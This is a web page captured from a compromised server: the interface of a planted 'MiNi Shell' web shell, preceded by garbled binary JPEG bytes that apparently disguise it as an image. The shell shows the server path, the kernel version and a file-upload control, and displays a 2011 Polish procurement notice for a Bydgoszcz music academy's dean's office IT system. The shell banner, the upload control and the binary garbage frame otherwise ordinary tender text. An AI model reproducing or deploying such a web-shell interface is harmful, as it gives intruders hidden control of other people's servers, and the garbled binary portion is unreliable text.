JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110228/68025-N-2011.html

<p class="kh_header"><b>Bydgoszcz: Dostawa systemu informatycznego AM- moduł Dziekanat</b><br>
<b>Numer ogłoszenia: 68025 - 2011; data zamieszczenia: 28.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Muzyczna im. Feliksa Nowowiejskiego , ul. Słowackiego 7, 85-008 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3211142, faks 052 3212350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.amuz.bydgoszcz.pl zakładka zamówienia publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa systemu informatycznego AM- moduł Dziekanat.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Założenia ogólne:
-zadaniem systemu jest kompleksowa obsługa potrzeb AM w zakresie obsługi dziekanatu (Dział Nauczania), ze szczególnym uwzględnieniem specyfiki zajęć, struktury oraz systemu nauczania uczelni artystycznej o specjalności muzycznej,
-system powinien mieć modułową budowę, by możliwe było jego wdrażanie etapami (np. uruchomienie ewidencji studentów oraz przebiegu ich nauki dla pracowników AM, w kolejnym etapie wdrożenie i uruchomienie elektronicznego systemu obsługi studentów za pomocą platformy internetowej, elektronicznej rekrutacji) oraz rozbudowa o dodatkowe moduły i funkcjonalności, wynikające z wdrażania zintegrowanego systemu zarządzania np.: płace, kadry, finansowo-księgowy, dział gospodarczy itp.,
-system powinien umożliwiać pracę stacjom roboczym  podłączonym do sieci rozległej, wynika to z rozmieszczenia obiektów dydaktycznych oraz administracyjnych w  obszarze całego miasta,
-system powinien pracować w sieci LAN  prawidłowo i wydajnie na okablowaniu kategorii 5e i sieci o wydajności 100Mb/s,
-system powinien umożliwiać zmiany konfiguracji  dla poszczególnych modułów, wynikające ze  zmian organizacyjnych oraz rozwoju uczelni poprzez administratora systemu AM, bez konieczności integracji firmy go dostarczającej,
-dostawca systemu w ramach zamówienia zobowiązuje się do: przeniesienia aktualnych danych zawartych w obecnie pracujących systemach na nową platformę programową, instalacji i wdrożenia nowego systemu, przeszkolenia pracowników  obsługujących system oraz administratora systemu, dostarczenia dokumentacji systemu w zakresie jego struktury, zarządzania jak i obsługi, dostarczenia specyfikacji platformy sprzętowej oraz systemowej niezbędnej do wydajnego działania oprogramowania,
-wymagane  jest założenie pełnej zgodności systemu z obowiązującymi przepisami prawnymi w zakresie prowadzenia dokumentacji toku studiów wynikającej z Ustawy o Szkolnictwie Wyższym oraz bezpieczeństwa danych osobowych
-wymagane  jest założenie pełnej kompatybilności w zakresie wymiany danych studentów i wykładowców  z systemem bibliotecznym Horizon - eksportowanie danych w celu obsługi systemu dziekanatu i biblioteki jedną kartą
-wymagane  jest założenie pełnej kompatybilności z systemem Płatnik w zakresie przekazywania danych do ZUS, kompatybilności z system bakowości elektronicznej w celu automatycznego przepływu danych (przelewy za wynagrodzenia, płatności np. media, faktury itp.)
-uczelnia zapewnia serwer plików z systemem Windows Serwer, dostawca oprogramowania powinien przedstawić specyfikację oprogramowania firm zewnętrznych niezbędnego do pełnego i wydajnego działania systemu informatycznego wraz z cennikiem ich zakupu i wdrożenia,
-dostawca powinien przedstawić całkowite koszty utrzymania systemu zawierające wszystkie konieczne i opcjonalne opłaty: np. opłaty serwisowo-licencyjne, opłaty licencyjne za oprogramowanie bazodanowe, maintenance, opłaty za dodatkowe szkolenia, aktualizacje systemu wynikające z dostosowania go do zmodyfikowanych aktów prawnych czy wsparcie techniczne,
-aktualna wersja systemu powinna umożliwiać pracownikom Kwestury  AM wgląd w  do ewidencji systemu opłat wnoszonych na  rzecz AM związanych z opłatami kształcenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, ze wykonawca spełnia warunek udziału w postępowaniu jeżeli, wykaże iż wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej jedno zamówienie polegające na wdrożeniu systemu do obsługi dziekanatu szkoły wyższej z możliwością pełnej integracji z kompleksowym systemem zarządzania uczelnią. Przez wdrożenie rozumie się- dostawę systemu, przeniesienie baz danych, instalacja oprogramowania na serwerze oraz stacjach klienckich, przeszkolenie wskazanej w umowie liczby pracowników, uruchomienie systemu jako osiągnięcie założonej funkcjonalności systemu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 7.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Jeżeli liczba wykonawców, którzy złożą wniosek o dopuszczenie do udziału w postępowaniu i spełniających ww. warunki udziału w postępowaniu będzie większą niż 7, to zamawiający zaprosi do dialogu tych wykonawców, którzy
uzyskają największą liczbę punktów za ocenę spełniania warunku w zakresie doświadczenia wykonawcy mierzonego ilością wykonanych, tj. zakończonych w okresie ostatnich 3 lat przed upływem terminu składania wniosków zamówień polegających na wdrożeniu systemu do obsługi dziekanatu szkoły wyższej z możliwością pełnej integracji z kompleksowym systemem zarządzania uczelnią. Przez wdrożenie rozumie się- dostawę systemu, przeniesienie baz danych, instalacja oprogramowania na serwerze oraz stacjach klienckich, przeszkolenie wskazanej w umowie liczby pracowników, uruchomienie systemu jako osiągnięcie założonej funkcjonalności systemu. Zamawiający będzie przyznawał po 1 pkt za każdą zrealizowaną dostawę (wdrożenie systemu)  spełniającą warunek i udziału w postępowaniu i potwierdzoną dokumentami stwierdzającymi należyte wykonanie. Wykonawcy będą kwalifikowani wg liczby otrzymanych pkt. Ten, który otrzyma największą liczbę punktów sklasyfikowany zostanie na 1 pozycji.  Pozostali wykonawcy klasyfikowani będą odpowiednio do uzyskanych pkt. Jeżeli liczba wykonawców spełniających warunki udziału w postępowaniu będzie mniejsza niż określona w ogłoszeniu to  zamawiający zaprosi do dialogu wszystkich tych którzy spełniają te warunki.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - fukcjonalność (pełna kompatybilność z systemem Horizon, Płatnik, Zus, przelewów bankowych - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przekazana wykonawcom którzy będą zaproszeni do składania ofert po dialogu.</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> Specyfikacja potrzeb poszczególnych modułów

Dział Nauczania :
Moduł Rekrutacja:
-	Ewidencja rekrutacji - edycja danych kandydatów,
-	Dokumenty rekrutacji oraz  ich ewidencja,
-	Dane szkoły średniej kandydata,
-	Dane szkoły wyższej,
-	Oceny i punkty,
-	Toki rekrutacji,
-	Egzaminy - dokumentacja, planowanie oraz ewidencja wyników egzaminów,
-	Terminy egzaminów - planowanie, powiadamianie, listy egzaminowanych i egzaminatorów,
-Obsługa Krem,
Opłaty egzaminacyjne - ewidencja oraz podgląd dla Kwestury AM,
-Progi punktowe - edycja dla poszczególnych kierunków,
-Rankingi rekrutacji - oceny kandydatów
-Wydruki, zestawienia - raporty, statystyki, sprawozdanie EN - 1, zaświadczenia
-Export  osób przyjętych na studia do systemu Dziekanat.

Moduł Dziekanat:
-Ewidencja studentów - dane personalno-adresowe, studenci niepełnosprawni, cudzoziemcy, Erasmus,
-Rejestr kadry naukowej -  stanowisko, tytuł naukowy, dane osobowe, pensum godzin,
-Toki studiów - definiowanie toku studiów, rodzaje, tryby, kierunki, sylabusy,
-Listy grup studenckich,
-Przedmioty i oceny - na każdym z semestrów, wyliczanie średniej ocen, punktacja ECTS,
-Protokoły - egzaminacyjne i zaliczeniowe, wydruki,
-Praktyki - ewidencja, oceny, dokumentacja,
-Praca dyplomowa - temat, ocena, promotor
-Opłaty - ewidencja płatności studenta, zaległości, nadpłaty, czesne, raty
-Stypendia - naliczanie, wydruki, listy wypłat transfer do kwestury
-Ewidencja umów o  kształceniu
-Komunikacja ze studentem - grupowe  wysyłanie powiadomień e-mail, sms,
-Możliwości wyszukiwania studenta wg. wybranego kryterium pn. roku urodzenia, peselu, numeru albumu, miejscowości itp. /sprawozdanie do GUS  S-10, S-11, S-12/
-Elektroniczny indeks (album) studenta,
-Zestawienia i wydruki - rejestr  wszystkich wydanych zaświadczeń, standardowe zaświadczenia np. do banku, ZUS, o pobieraniu nauki, generowanie własnych szablonów zaświadczeń, karty egzaminacyjne, zaliczeniowe, dyplomy i odpisy, suplementy w różnych językach, świadectwo ukończenia studiów podyplomowych, dyplomy studiów doktoranckich, raporty

Moduł Komunikacja - Wirtualna uczelnia
-Dostęp przez WWW,
-Dane osobowe studentów.
-Informacje finansowe - przyznanie stypendiów, historia płatności, należności i zaległości wobec uczelni,
-Plan zajęć oraz system elektronicznej rezerwacji sal dla wykładowców i studentów,
-Przedmioty, zaliczenia, egzaminy, oceny
-Powiadomienia - przesyłanie różnorodnych wiadomości, ankiet, pytań, podań
-Prace dyplomowe - dostęp do recenzji, ocen

Moduł Elektroniczna rekrutacja WWW
-Rejestracja kandydatów - dane osobowe, adresowe, ukończenie szkoły, wybór kierunków, form, poziomów i trybu studiów, wprowadzenie wyników egzaminu maturalnego/dojrzałości lub ukończenia studiów, obserwacja pozycji rankingowej w trakcie etapu rejestracji, zakwalifikowania i pozycji na liście rankingowej po rekrutacji internetowej, status po zakończeniu przyjmowania dokumentów i ogłoszeniu list przyjętych
-Konfigurowanie systemu rekrutacji wg potrzeb uczelni przez pracowników Działu Nauczania i Komisji rekrutacyjnej,
-Komunikacja z kandydatami - powiadomienia, wyniki.</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje nagród..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2011 godzina 10:00, miejsce: Wniosek należy złożyć w siedzibie Zamawiającego w Bydgoszczy ul. J. Słowackiego 7, pokój nr 18 (Sekretariat Kanclerza)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com